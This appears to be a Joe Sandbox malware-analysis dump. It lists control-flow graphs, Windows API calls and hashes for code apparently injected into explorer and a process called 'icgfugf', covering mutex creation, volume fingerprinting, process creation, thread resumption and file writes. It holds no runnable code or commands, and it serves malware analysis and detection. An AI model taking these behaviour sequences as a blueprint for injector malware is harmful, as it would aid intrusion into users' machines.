                                                                                                                                                                                                              control_flow_graph 158 121230c-1212369 call 1213de0 161 1212817 158->161 162 121236f-1212374 158->162 163 121281d-1212837 161->163 162->161 164 121237a-121237d 162->164 164->161 165 1212383-121238e 164->165 166 1212394-12123c7 call 1214fc8 165->166 167 1212807-121280d call 1215348 165->167 166->167 173 12123cd-12123f2 call 1214f1c call 12150dc 166->173 170 1212812-1212815 167->170 170->161 170->163 178 12123f4-121240e 173->178 179 121241d 173->179 178->179 183 1212410-121241b 178->183 180 1212422-121243b call 12150dc 179->180 185 1212441-1212454 180->185 186 12125aa-12125b2 180->186 183->180 187 12124a6-12124a8 185->187 188 1212456-121249d 185->188 189 12125b8-12125bc 186->189 190 121279d-12127ca call 1213de0 186->190 187->186 192 12124ae-1212520 call 1215368 DeleteFileW CreateFileW 187->192 188->187 193 12125c2-12125ca 189->193 194 1212664-12126f4 call 12146a0 call 1213444 call 1213de0 call 1215348 189->194 203 12127cc-12127d3 190->203 204 12127ff-1212805 190->204 219 1212522-1212579 call 1214f1c call 1214fc8 WriteFile 192->219 220 121259f-12125a5 call 1215348 192->220 199 12125d0-12125dd 193->199 200 12126f9-1212726 call 1213de0 193->200 194->167 199->204 210 12125e3-12125e6 199->210 200->204 212 121272c-1212733 200->212 203->204 209 12127d5-12127d8 203->209 204->167 209->204 213 12127da-12127fa call 1212840 call 1215348 209->213 210->204 215 12125ec-12125f0 210->215 212->204 217 1212739-121273c 212->217 213->204 221 12125f2-121261f call 1213de0 215->221 222 1212657-121265e 215->222 217->204 224 1212742-121279b call 1212840 call 12146a0 call 1215348 217->224 252 1212582-121259a call 1214920 call 12152cc 219->252 220->186 237 1212651-1212655 221->237 238 1212621-1212628 221->238 222->194 222->204 224->204 237->221 237->222 238->237 242 121262a-121262d 238->242 242->237 246 121262f-121264c call 1212840 call 1215348 242->246 246->237 252->220
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CreateDeleteWrite
                                                                                                                                                                                                              • String ID: |:|
                                                                                                                                                                                                              • API String ID: 2199199414-3736120136
                                                                                                                                                                                                              • Opcode ID: 68de4d4afa44634a81d69be9055df3b69c70ab86dd911ad0842af107fab504d1
                                                                                                                                                                                                              • Instruction ID: 0a251c223de8a1c7af147a96954e3c47c352258054c3e85e440000159781c956
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68de4d4afa44634a81d69be9055df3b69c70ab86dd911ad0842af107fab504d1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FE1A430728F498FD719EB6C84586BA76D1FBA8311F10062EE59FC3285DF74E9028786

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 01214C90: GetVolumeInformationA.KERNEL32 ref: 01214CFD
                                                                                                                                                                                                              • CreateMutexExA.KERNEL32 ref: 01211DFF
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32 ref: 01211EB1
                                                                                                                                                                                                              • SleepEx.KERNEL32 ref: 01211EEE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$FileInformationMappingMutexSleepVolume
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3744091137-0
                                                                                                                                                                                                              • Opcode ID: bec04341e68e41191309d4d7042bdcbdacfc5724437166af108988488ca901a6
                                                                                                                                                                                                              • Instruction ID: 3e4d9a0ad5b6f19f8b310d802d6b962b7734163c5153c6eae85a28f37a3936d0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bec04341e68e41191309d4d7042bdcbdacfc5724437166af108988488ca901a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5417230724F098FEB64EB78C0587BE76D2EBB8706F104A2E915FD6249CF7496029781

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AttributesCreateTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1986686026-0
                                                                                                                                                                                                              • Opcode ID: aef3a88ecf34d46dcc14474b3be831e8934c1aef16e8b3208ee60c12b5e4277e
                                                                                                                                                                                                              • Instruction ID: 11a4bf7d34150c161976d359d50e2376006e7afa233bb9326084cfe92f716f4f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aef3a88ecf34d46dcc14474b3be831e8934c1aef16e8b3208ee60c12b5e4277e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E21F13071CB488FDF64EF68988879E76E2FBE8701F10456EA85ED7245DA34DA058782

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 325 1212cd0-1212cfe call 12132ec 328 1212f92-1212fa2 325->328 329 1212d04-1212d0f 325->329 329->328 330 1212d15-1212d17 329->330 331 1212f7d-1212f8d call 12152cc 330->331 332 1212d1d-1212d26 330->332 331->328 332->331 333 1212d2c-1212d33 332->333 333->331 335 1212d39-1212d6f call 1214d8c 333->335 335->331 340 1212d75-1212d94 call 1214518 335->340 343 1212f67-1212f78 call 12152cc * 2 340->343 344 1212d9a-1212d9b 340->344 343->331 346 1212d9d-1212dbf 344->346 350 1212f55-1212f60 346->350 351 1212dc5-1212de0 call 1214fc8 346->351 350->343 351->350 354 1212de6-1212dea 351->354 354->350 355 1212df0-1212e02 354->355 356 1212e04-1212e06 355->356 357 1212e0c-1212e31 call 1214578 355->357 356->357 358 1212f34-1212f4f SleepEx 356->358 361 1212e37-1212ee9 call 1215328 call 1212fac 357->361 362 1212f29-1212f2f call 12152cc 357->362 358->346 358->350 373 1212eeb-1212ef3 361->373 374 1212efa-1212f0a ResumeThread call 12152cc 361->374 362->358 373->374 376 1212f0f-1212f22 374->376 376->362
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012132EC: CreateFileW.KERNEL32 ref: 01213332
                                                                                                                                                                                                                • Part of subcall function 012132EC: ReadFile.KERNEL32 ref: 01213379
                                                                                                                                                                                                              • ResumeThread.KERNEL32 ref: 01212EFE
                                                                                                                                                                                                              • SleepEx.KERNEL32 ref: 01212F43
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CreateReadResumeSleepThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3143597149-0
                                                                                                                                                                                                              • Opcode ID: a3a1c5e17b7eb0d277520424006382d2b60eeb30d806cae851d29cab29a01f4e
                                                                                                                                                                                                              • Instruction ID: b8d982cf4be1e2ce235116dd7c03eb4a73ba64f627e564d0599c40ec4072cbfe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3a1c5e17b7eb0d277520424006382d2b60eeb30d806cae851d29cab29a01f4e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF719630318F4A9FD769EB28C4587BAB7D2FBA8311F54452DE49EC3245DF34A8428782

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 379 12132ec-121333f CreateFileW 380 1213341-1213351 379->380 381 12133b5-12133b8 379->381 388 1213353-1213387 call 1215328 ReadFile 380->388 389 12133ac-12133ad 380->389 382 1213420-1213421 381->382 383 12133ba-12133bd 381->383 384 1213423-121343c 382->384 383->382 385 12133bf-12133e1 call 1215328 call 1214f1c 383->385 396 12133e3-1213406 385->396 395 121338f-12133a3 call 1214fc8 388->395 389->381 395->389 401 12133a5-12133a6 395->401 400 1213408-121341e call 12152cc * 2 396->400 400->384 401->389
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CreateRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3388366904-0
                                                                                                                                                                                                              • Opcode ID: 97e3ee78e2a824059bb89df07087900ddd79eba1d88e909009dc489151522fc3
                                                                                                                                                                                                              • Instruction ID: 415daabd554e26c1a9b76537a60554054290b72827a502e1ea8c425933796258
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97e3ee78e2a824059bb89df07087900ddd79eba1d88e909009dc489151522fc3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C41A43072CF0E4FD758EB6C98593BAB6D2FBE9221F14026EA59BC3245DE64981247C1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 406 1214e00-1214e49 call 1214f1c 410 1214ed3-1214f02 call 12152cc ObtainUserAgentString 406->410 411 1214e4f 406->411 412 1214e51-1214e93 call 1214f1c RegQueryValueExA 411->412 417 1214f03 call 12152cc 412->417 418 1214e95-1214eb4 call 12152cc call 12150dc 412->418 421 1214f08-1214f0d 417->421 418->421 427 1214eb6-1214ec7 418->427 423 1214ec9-1214eca 421->423 424 1214f0f 421->424 423->410 424->412 427->423
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32 ref: 01214E85
                                                                                                                                                                                                              • ObtainUserAgentString.URLMON ref: 01214EEE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AgentObtainQueryStringUserValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4107646653-0
                                                                                                                                                                                                              • Opcode ID: 7053384ea0e9f833c31672209a37f03a32c16d8813cdeaa02f55fad0c755537e
                                                                                                                                                                                                              • Instruction ID: 2f6f8f12b9c80d24c33c7509545442238dfd445ad40db0cb74af8e72edce694e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7053384ea0e9f833c31672209a37f03a32c16d8813cdeaa02f55fad0c755537e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A631763161CA4D8FDB18FF68D8496F977D5FBA8310B00027AE95ED3549EF6098054791

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE ref: 01214A94
                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE ref: 01214ACB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InformationToken
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4114910276-0
                                                                                                                                                                                                              • Opcode ID: 68ca21c3e1851e8b1733aa8d0b218e84f9a464e173bc11e28978421e877b90ef
                                                                                                                                                                                                              • Instruction ID: fa210b08ae9005c9f3e3f583b1d2b8d5d48b7fe6f68815c2fb0093d2ef37bc8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68ca21c3e1851e8b1733aa8d0b218e84f9a464e173bc11e28978421e877b90ef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6213130618B498FC754EB28C49866AB7F1FBD9311B000A6EE59AC7264DB70E845DB81

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 443 1213cd0-1213ce0 444 1213ce2-1213d04 EnumWindows SleepEx 443->444 445 1213d06-1213d14 443->445 444->444 444->445
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnumSleepWindows
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 498413330-0
                                                                                                                                                                                                              • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                                                                                                              • Instruction ID: 189496698ec61c2978d95356556b06472c48f9dec15f5c9c44051340f94b032d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4E04F305146098FFB28EBA5C0D8BB036E2FB28216F24017ADD0EDD28ACB764945C720

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 446 1213f7c-1213fbd 447 1213fc6-121400c call 1215328 call 1215274 call 1214434 446->447 448 1213fbf-1213fc1 446->448 456 121401a-1214020 447->456 457 121400e-1214018 447->457 449 121439c-12143b7 448->449 458 1214022-1214030 456->458 457->458 460 1214036-121406d 458->460 461 121438e-1214394 call 12152cc 458->461 466 1214383-1214384 460->466 467 1214073-121409e 460->467 463 1214399-121439a 461->463 463->449 466->461 467->466 469 12140a4-12140b9 467->469 470 12140bb-12140bd 469->470 471 121410f-1214114 469->471 472 1214117-1214150 470->472 473 12140bf-12140db call 1214f1c 470->473 471->472 479 1214350-121435d 472->479 480 1214156-121415c 472->480 477 12140f9-121410d call 1214f1c 473->477 478 12140dd-12140f4 call 1214fc8 473->478 477->472 478->477 492 121436a-121436d 479->492 493 121435f-1214365 call 12152cc 479->493 483 121417e-1214188 480->483 484 121415e-121417b 480->484 485 1214233-1214259 483->485 486 121418e-1214199 483->486 484->483 501 1214332-1214343 485->501 502 121425f-1214270 485->502 490 12141a0-121422b call 1214f1c call 1215328 call 1215384 call 1214f1c call 12143c0 call 12152cc * 3 486->490 491 121419b 486->491 490->485 491->490 496 121437a-1214380 492->496 497 121436f-1214375 call 12152cc 492->497 493->492 496->466 497->496 501->479 507 1214345-121434b call 12152cc 501->507 502->501 509 1214276-12142a1 502->509 507->479 514 12142a3-12142ad 509->514 516 12142cd-12142eb 514->516 517 12142af-12142cb RtlReAllocateHeap 514->517 522 12142ed 516->522 523 12142ef-12142f4 516->523 517->516 522->523 523->514 525 12142f6-1214301 523->525 527 1214303-1214309 call 1215368 525->527 528 1214322-121432a 525->528 532 121430e-1214318 527->532 528->501 532->528
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9091676639883dede0ac74a3910d6ff904a65868e732797b04c243de0a589481
                                                                                                                                                                                                              • Instruction ID: 8bc3c4f603bb436d27b50b8bcec4a218db8280f05f94d179013cc2cf69182de9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9091676639883dede0ac74a3910d6ff904a65868e732797b04c243de0a589481
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7D18230728B4A8FDB54EF6CD4456AEB7E2FBA8701F10452DE54AD3245DF74E8428B82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateProcessInternalW.KERNEL32 ref: 0121465C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2186235152-0
                                                                                                                                                                                                              • Opcode ID: 20bc06d3c9603a1f93a838c7453b69685924109dff400b81ce65c25d4e0f13d4
                                                                                                                                                                                                              • Instruction ID: 006c269a5644f10625c580c7916bb851e0541b9078e3de0914172d826a738c49
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20bc06d3c9603a1f93a838c7453b69685924109dff400b81ce65c25d4e0f13d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73316D70718F494FCB54EF6C908876AB6D2FBA8311F104A6EA44ED3249DBB4D8458781
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32 ref: 01214CFD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InformationVolume
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2039140958-0
                                                                                                                                                                                                              • Opcode ID: e3a068c544d54274b2f691d69e2d0b76757b6d9d853b28fb5bc8ff180a56102b
                                                                                                                                                                                                              • Instruction ID: 86820fad2c10ce9afb99b460416d3893d3adf1e27c383c3e05219b19a2beb8e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3a068c544d54274b2f691d69e2d0b76757b6d9d853b28fb5bc8ff180a56102b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02316931618B4C8FDB64EF68D448BAA77E1FBE8311F10466E984ED7264DE30D9458B81
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012119D0: RtlCreateHeap.NTDLL ref: 01211AE7
                                                                                                                                                                                                              • SleepEx.KERNEL32(?,?,?,?,?,?,?,01211973), ref: 012119A0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHeapSleep
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 221814145-0
                                                                                                                                                                                                              • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                                                                                                              • Instruction ID: c050d20926a3cc092cf1a722e3d0d9f9fad53c8b6fe41417bd93d614ebcc3ff1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3E04814734A0D4BDB94FB79948473C65E2DBF8150F541579672DC618DD834C8608312
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: tP^q
                                                                                                                                                                                                              • API String ID: 0-2862610199
                                                                                                                                                                                                              • Opcode ID: 3f6d7c6bc866c9806c4e4a7f67f6327d1db1db5ed772dc933aa648e87257d4a5
                                                                                                                                                                                                              • Instruction ID: bc9c48053727b0918433597c8f1dde88dd1be7ee29bd36ba95aa7fe450957d0c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f6d7c6bc866c9806c4e4a7f67f6327d1db1db5ed772dc933aa648e87257d4a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 063128757016118FCB49AB38D45882D7BE2EF8A72636104B8E50ACF3B5DE36DC42CB91
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 8bq
                                                                                                                                                                                                              • API String ID: 0-187764589
                                                                                                                                                                                                              • Opcode ID: 569e619e77ccc29a9c6c11bb52a21d64b5fb3a9f2d527c0a25d8aef8e6f02c45
                                                                                                                                                                                                              • Instruction ID: 158c3cec2b94615e7214818dc8711267bac6912cbba7f8d7f34b32415cbf20a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 569e619e77ccc29a9c6c11bb52a21d64b5fb3a9f2d527c0a25d8aef8e6f02c45
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24F02EB42162409FC702E7ACE4556657BD0EF89315710C5B9E14D8F3A7DF205D0797D1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 8bq
                                                                                                                                                                                                              • API String ID: 0-187764589
                                                                                                                                                                                                              • Opcode ID: 02f46b871750f814bd9143ffa0f7e4034e62921dee90e3b8c1cad85b7d71fcaf
                                                                                                                                                                                                              • Instruction ID: 1a10f4a3c56cd599c4e0b5766d646048db1da3895732014e93eba8d205a0f80d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02f46b871750f814bd9143ffa0f7e4034e62921dee90e3b8c1cad85b7d71fcaf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85E0D8742202008FC601FBACE440B6AB7D9EFC8315B008478E10D8F395DF30AD019BD0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 95553d7dd82da63b8f9a9706969c6a49ea3ee2708a512b9d5952f594b80d013d
                                                                                                                                                                                                              • Instruction ID: 053fa20647a65b58a1474245a4cbaab97fd566cc1324be76bd48edc6240bc05a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95553d7dd82da63b8f9a9706969c6a49ea3ee2708a512b9d5952f594b80d013d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1481EF30A003049FDB05EBB8D8446AEB7F2EB88311F24C569E409DB356DF79AD46CB91
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0e30daab5bed98d79e88b17bf4989eafc6c905a84f3c6f0e7789f527fdb1d129
                                                                                                                                                                                                              • Instruction ID: 998c65d4ccc88a3308e88092f47d9e206171d21332c7b636188f94e128a5bc42
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e30daab5bed98d79e88b17bf4989eafc6c905a84f3c6f0e7789f527fdb1d129
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E215930B002098FEB04ABB8D54876DB7E2FFC8715F208468D849DB355DF799C828B92
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8993f1cd31383b367c293399c76544685466b99aa104f4ce6ed6413d5c6852eb
                                                                                                                                                                                                              • Instruction ID: ba69a912c6c3de3a17a08f3d24e2a853fb9c4652f9241f772641cac2edc0bf51
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8993f1cd31383b367c293399c76544685466b99aa104f4ce6ed6413d5c6852eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DF090792282449FCB46ABA4F4849653F71EF4972172041A5E90CCF327DB25DC45EB41
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 3473de7242e109c8553a1ecbdeeab7d0fefe06aee71fdf961a9d5510d90d464f
                                                                                                                                                                                                              • Instruction ID: cea12093528bff740cd2ebc6c02d30a04501af19a99d2c9853d3f6d6e8fa2a10
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3473de7242e109c8553a1ecbdeeab7d0fefe06aee71fdf961a9d5510d90d464f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17E0C2B51583848FCB425B70E4695613F70EB4B210B2200E9DA0C8F263DA349C46CB01
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
